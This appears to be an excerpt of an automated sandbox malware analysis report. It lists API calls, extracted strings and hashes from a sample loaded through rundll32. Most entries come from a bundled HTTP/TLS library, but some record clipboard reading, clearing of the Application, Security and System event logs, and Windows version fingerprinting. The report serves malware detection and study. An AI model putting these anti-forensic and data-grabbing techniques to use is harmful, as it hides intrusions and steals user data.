                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: htons$Hook@@Installbind
                    • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                    • API String ID: 3907360717-586563453
                    • Opcode ID: f6c41612ded864ed8b7167036cb935c596cca3c60a33f6de6d5ae29ef2327864
                    • Instruction ID: ffd15fdb9650a1523ec32383704bad971fb51efbbeea2f618b4b3a40a8b2d888
                    • Opcode Fuzzy Hash: f6c41612ded864ed8b7167036cb935c596cca3c60a33f6de6d5ae29ef2327864
                    • Instruction Fuzzy Hash: 60D1E271608346AFF711DB24C844FBB7BECEF86308F45452DF98897242E76199098BA6
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Version_memset_strncpy
                    • String ID: Unknown$Windows 10$Windows 2000$Windows 2008 R2$Windows 2012$Windows 2012 R2$Windows 2016$Windows 2019$Windows 7 SP1$Windows 8$Windows 8.1 Update 1$Windows Vista SP2$Windows XP
                    • API String ID: 1449955169-2950701659
                    • Opcode ID: eed5dff31ca2a4965d692304d94e49b37a672d3a3ba452f2c7cea829020d413c
                    • Instruction ID: 36ac31982963c768f2cbf6a91718572f08dde965ea90880211b8018652953abd
                    • Opcode Fuzzy Hash: eed5dff31ca2a4965d692304d94e49b37a672d3a3ba452f2c7cea829020d413c
                    • Instruction Fuzzy Hash: 39315430B80314ABDF349920AF43FB97264A700B08F54F4DEED99E95C1E9A179A75F42
                    APIs
                    • CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 6D03F601
                    • CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 6D03F622
                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6D03F62E
                    • GetLastError.KERNEL32(?,00000100), ref: 6D03F648
                    Strings
                    • schannel: added %d certificate(s) from CA file '%s', xrefs: 6D03F6E8
                    • schannel: did not add any certificates from CA file '%s', xrefs: 6D03F6D4
                    • schannel: failed to extract certificate from CA file '%s': %s, xrefs: 6D03F698
                    • -----BEGIN CERTIFICATE-----, xrefs: 6D03F57C
                    • schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 6D03F659
                    • schannel: CA file '%s' is not correctly formatted, xrefs: 6D03F6B4
                    • -----END CERTIFICATE-----, xrefs: 6D03F5AA
                    • schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 6D03F665
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
                    • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                    • API String ID: 854292303-665156428
                    • Opcode ID: f2256ad029abc3f23003c91e8d81e9546277946cb09730639be554221540a80a
                    • Instruction ID: 06f304d00a4b27252b9ea4999f3f0ece511e3d88cfae0c0dbe96ad5664daae78
                    • Opcode Fuzzy Hash: f2256ad029abc3f23003c91e8d81e9546277946cb09730639be554221540a80a
                    • Instruction Fuzzy Hash: 4E41D17150C352ABF3219F248C00F6FBBE8FB89708F02091DF688A62A1D775D5148B9A
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s$%x$0$100-continue$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Type$Content-Type: application/x-www-form-urlencoded$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request
                    • API String ID: 0-502057143
                    • Opcode ID: d8d1b7f73c8c2d35fd31064ccaf0c7fb366802cc293a5a1c5c7432e6239ee8fe
                    • Instruction ID: a9b53d119bb2104ae79e7c900e9fd172e9faedd21a8d0df181afd2c495ff9d95
                    • Opcode Fuzzy Hash: d8d1b7f73c8c2d35fd31064ccaf0c7fb366802cc293a5a1c5c7432e6239ee8fe
                    • Instruction Fuzzy Hash: C5120675A0C706BBF3109BE4DC41FA7B7E8BF0831CF404929F929A6292E735E5548792
                    APIs
                      • Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
                      • Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435
                    • CertGetNameStringA.CRYPT32(?,00000006,00010002,00000000,?,?), ref: 6D03FA3E
                    Strings
                    • schannel: CertFindExtension() returned no extension., xrefs: 6D03FAA5
                    • schannel: Null certificate info., xrefs: 6D03FA89
                    • schannel: Not enough memory to list all host names., xrefs: 6D03FBC7
                    • schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 6D03FAE2
                    • schannel: Empty DNS name., xrefs: 6D03FB31
                    • 2.5.29.17, xrefs: 6D03FA96, 6D03FACE
                    • schannel: Null certificate context., xrefs: 6D03FA7B
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressCertHandleModuleNameProcString
                    • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                    • API String ID: 4138448956-2160583098
                    • Opcode ID: 426de16b39926d5f5f33868c726d9b7f3a33f78011e3d127b4730febe20760fb
                    • Instruction ID: 9dc178d22e853ddd6d5064e4f194382a54ca730f3cd9646d9907f823c1e2ebbf
                    • Opcode Fuzzy Hash: 426de16b39926d5f5f33868c726d9b7f3a33f78011e3d127b4730febe20760fb
                    • Instruction Fuzzy Hash: 42510071208353EFF7108F04C850BAABBE9FF85748F51445CFA945B292D3B69588CB96
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: __vfprintf_l
                    • String ID: -----END PUBLIC KEY-----$ public key hash: sha256//%s$-----BEGIN PUBLIC KEY-----$;sha256//$Z$Z$sha256//
                    • API String ID: 86772892-1456817947
                    • Opcode ID: 2712e74e0a1cffb06682625dceda672356b3a87e0d251e24630d3a287daf80c1
                    • Instruction ID: 0bc624d24cc44d6310a279b0b95e2f50d1269032e7b82ed331b2b3940a1f768d
                    • Opcode Fuzzy Hash: 2712e74e0a1cffb06682625dceda672356b3a87e0d251e24630d3a287daf80c1
                    • Instruction Fuzzy Hash: 30C1587590C7412BF7135F289C40F3F7BF5AF8A228F554658E8994B381E732E4068792
                    APIs
                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 6D02FBC1
                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 6D02FC93
                    • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 6D02FDD3
                    Strings
                    • Received unexpected DATA packet block %d, expecting block %d, xrefs: 6D02FC14
                    • Timeout waiting for block %d ACK. Retries = %d, xrefs: 6D02FCE1
                    • tftp_rx: internal error, xrefs: 6D02FDF9
                    • Received last DATA packet block %d again., xrefs: 6D02FB61
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: sendto
                    • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                    • API String ID: 1876886790-2298932677
                    • Opcode ID: 9f2e8d18e0a942a5ecf7ceab1acad30f7fe2b6b3c92cf985f868e42a36eafe0a
                    • Instruction ID: 3583432b0388aabd07927654bcd9122e6b72078ad93fa5a4dfc0c1e9e7a374fd
                    • Opcode Fuzzy Hash: 9f2e8d18e0a942a5ecf7ceab1acad30f7fe2b6b3c92cf985f868e42a36eafe0a
                    • Instruction Fuzzy Hash: 5C91AF752047409FE7319B28D881BEBBBE4FF49305F44482EEA9EC72A1D775A444CB92
                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,?,?,00000000), ref: 6D0471A3
                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 6D0471BF
                    • CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 6D0471DC
                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000), ref: 6D0471F9
                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000), ref: 6D047216
                    • CryptDestroyHash.ADVAPI32(?), ref: 6D047225
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6D047236
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                    • String ID:
                    • API String ID: 3606780921-3916222277
                    • Opcode ID: 3bdc4efedc6cec46306aa84812f7c00897506034b4543cafa59f7af86a54eb46
                    • Instruction ID: 3de2a6d711aa8120941230aa9116ee6ffc27b380dec2eed8570173868778f6fb
                    • Opcode Fuzzy Hash: 3bdc4efedc6cec46306aa84812f7c00897506034b4543cafa59f7af86a54eb46
                    • Instruction Fuzzy Hash: 85110A70648305BBFB109F51CD0AF1E7BF8BB85B11F508828B684E90E1D7B1D8589B96
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$%s%x$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$,$0$0$FALSE$GMT$TRUE
                    • API String ID: 0-234648713
                    • Opcode ID: bacc8ed75115f056c03aa8ac752bd560be481ed0ab9028d5ac7c7ba272436f33
                    • Instruction ID: 75fa1cfd201fe6e009166313835152982a7d59cfd631a1330b5574a37d351670
                    • Opcode Fuzzy Hash: bacc8ed75115f056c03aa8ac752bd560be481ed0ab9028d5ac7c7ba272436f33
                    • Instruction Fuzzy Hash: 25620574B08282DFF7258E388890F6B7BE6ABCA304F14C93DE581CB246D635D945C762
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                    • API String ID: 0-2602438971
                    • Opcode ID: abcbb587212fe67ef7517abb5c51a6b5c7b963d7a9e84559c8938fdad2d33fa9
                    • Instruction ID: 278c0db6b36aaa398806261522949163c252385eb28dd7203b7b7bf0cd5cab97
                    • Opcode Fuzzy Hash: abcbb587212fe67ef7517abb5c51a6b5c7b963d7a9e84559c8938fdad2d33fa9
                    • Instruction Fuzzy Hash: 15B1DC6161C181CAE3119F3894A1BF67BE7AB97318FC8CCB9C8C5CB242E657D54D82D2
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$%s%x$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$0$FALSE$GMT$TRUE
                    • API String ID: 0-790606662
                    • Opcode ID: 46e42f9579e8e427318577b136b2c25c29554444680ff02912075471a9a47340
                    • Instruction ID: f6f168103fa02415aae7a0238a017a82a12d6f3baaf3bf8b03d8d7ca23dc8d70
                    • Opcode Fuzzy Hash: 46e42f9579e8e427318577b136b2c25c29554444680ff02912075471a9a47340
                    • Instruction Fuzzy Hash: 15C1CE75A08251DFF7324A398C40F7F7BE9EB9A344F04C938EA96CB252D221D951C762
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy$memory shortage$no_proxy$space-separated NOPROXY patterns are deprecated
                    • API String ID: 0-2679089201
                    • Opcode ID: 7fb3d095b89a72a6f27c9e25eaa533aae450214d8c3c245dacb218d52efa93e0
                    • Instruction ID: a2778911df6ebdfc9a5984c12fb04d58c4548f5e019933502793ca16156c9772
                    • Opcode Fuzzy Hash: 7fb3d095b89a72a6f27c9e25eaa533aae450214d8c3c245dacb218d52efa93e0
                    • Instruction Fuzzy Hash: BED1B474908746AFF721DF35C844BAB7BF8AF86308F04442DE99987242E775E548CB62
                    APIs
                    • OpenClipboard.USER32(00000000), ref: 04EC60AA
                    • GetClipboardData.USER32(00000001), ref: 04EC60BA
                    • GlobalLock.KERNEL32(00000000), ref: 04EC60C4
                    • GlobalUnlock.KERNEL32(?), ref: 04EC6193
                    • CloseClipboard.USER32 ref: 04EC6199
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                    • String ID: NULL
                    • API String ID: 1006321803-324932091
                    • Opcode ID: 1d75e209addc2a44d1d34c2cc50d453036764d316d36043456051fa958997654
                    • Instruction ID: 8ec9f4ea990419be25a758011b9c9621290b1a06c3d5d546debd86c395695112
                    • Opcode Fuzzy Hash: 1d75e209addc2a44d1d34c2cc50d453036764d316d36043456051fa958997654
                    • Instruction Fuzzy Hash: 483124B5804241AFC701CF38D858AD77BF9DF45305B0982A8E889CB306EA30E609C790
                    APIs
                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,00000000,?), ref: 6D01D4FB
                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 6D01D51B
                    • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 6D01D533
                    • CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000000), ref: 6D01D54F
                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 6D01D570
                    • CryptDestroyHash.ADVAPI32(?), ref: 6D01D57F
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D01D590
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                    • String ID:
                    • API String ID: 3606780921-0
                    • Opcode ID: b22f38fe272767b6faf0bc96024d2c64acb07032bef85cd2807ebcd8646c27e2
                    • Instruction ID: f5af49af4412cd3c53c464a5cc2dced12ec3f995051c329c34277f455395ef28
                    • Opcode Fuzzy Hash: b22f38fe272767b6faf0bc96024d2c64acb07032bef85cd2807ebcd8646c27e2
                    • Instruction Fuzzy Hash: 222119B0608302ABFB109F51CC05F5B7BF8BB89B58F504918F684AA090D7B1D508DBA6
                    APIs
                    • CryptAcquireContextA.ADVAPI32(?), ref: 6D048923
                    • CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000001), ref: 6D04893F
                    • CryptHashData.ADVAPI32(?,?,00000000,00000000,F0000040,?,00000000,00000000), ref: 6D04895C
                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?), ref: 6D048979
                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000), ref: 6D048996
                    • CryptDestroyHash.ADVAPI32(?), ref: 6D0489A5
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6D0489B6
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                    • String ID:
                    • API String ID: 3606780921-0
                    • Opcode ID: c5a244a10454f455027d2ff081dac3d716860cb953be2ebe53031ded37d46911
                    • Instruction ID: ea9003b1238ea6b3ffa2f38333bc8019f2fff9763c2fa52dd91ac9016cccd03d
                    • Opcode Fuzzy Hash: c5a244a10454f455027d2ff081dac3d716860cb953be2ebe53031ded37d46911
                    • Instruction Fuzzy Hash: 4C11E670248306BBFB109F11CD0AF1E7BF8AB45B11F408828B684A91E1D7B1D8589BA7
                    APIs
                    • OpenEventLogA.ADVAPI32(00000000,04ECB7EC), ref: 04EC58FD
                    • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 04EC5908
                    • CloseEventLog.ADVAPI32(00000000), ref: 04EC590F
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Event$ClearCloseOpen
                    • String ID: Application$Security$System
                    • API String ID: 1391105993-2169399579
                    • Opcode ID: 81567abecb15f9ba8158bdf40a2b3cb9bd38c16b07690b953f1c10c32638a36f
                    • Instruction ID: 7527a7cb3fd2c34ed58f5aee50f832e1945dbc352cb450bcfdfe02940669a1a6
                    • Opcode Fuzzy Hash: 81567abecb15f9ba8158bdf40a2b3cb9bd38c16b07690b953f1c10c32638a36f
                    • Instruction Fuzzy Hash: FEF0A776A011247BD3119B9BED4AA8FF7BCFF45315F001168EA1893101C63079078795
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: da36895746b49667b337fbb6b64e1e602e17fdc46d84d5f6af23abb677413513
                    • Instruction ID: 9d0b7b8b9e2d23a17716c4d75a18872b738f9ac46f7b2b871c02ee7751231c16
                    • Opcode Fuzzy Hash: da36895746b49667b337fbb6b64e1e602e17fdc46d84d5f6af23abb677413513
                    • Instruction Fuzzy Hash: 13D20771E082698FEB65CF28DD407EAB7F5EB45304F1441EAD80DE7280E778AA858F51
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                    • API String ID: 0-2102732564
                    • Opcode ID: c6181c1a4656eded0ef0d697b07d90caf7c3ed6ac4a07c8dbe81dfa510abb5fb
                    • Instruction ID: a6bd5b69df4a5fddc38295ea07776c54fda7bd515faeced0bf74d43bafff2c2f
                    • Opcode Fuzzy Hash: c6181c1a4656eded0ef0d697b07d90caf7c3ed6ac4a07c8dbe81dfa510abb5fb
                    • Instruction Fuzzy Hash: 76510672B1860A6BF70889ADDC81B7F71D9A7C9318F89053CF906D7392E698CD054196
                    APIs
                    • CryptAcquireContextA.ADVAPI32 ref: 6D045D6B
                    • CryptImportKey.ADVAPI32(?,?,00000014,00000000,00000000,?,F0000040,?,0000000E,0000000E,00000000,0000000E,?,?,0000000E,?), ref: 6D045E2A
                    • CryptReleaseContext.ADVAPI32(?,00000000,?,6D02B622,?,?), ref: 6D045E3A
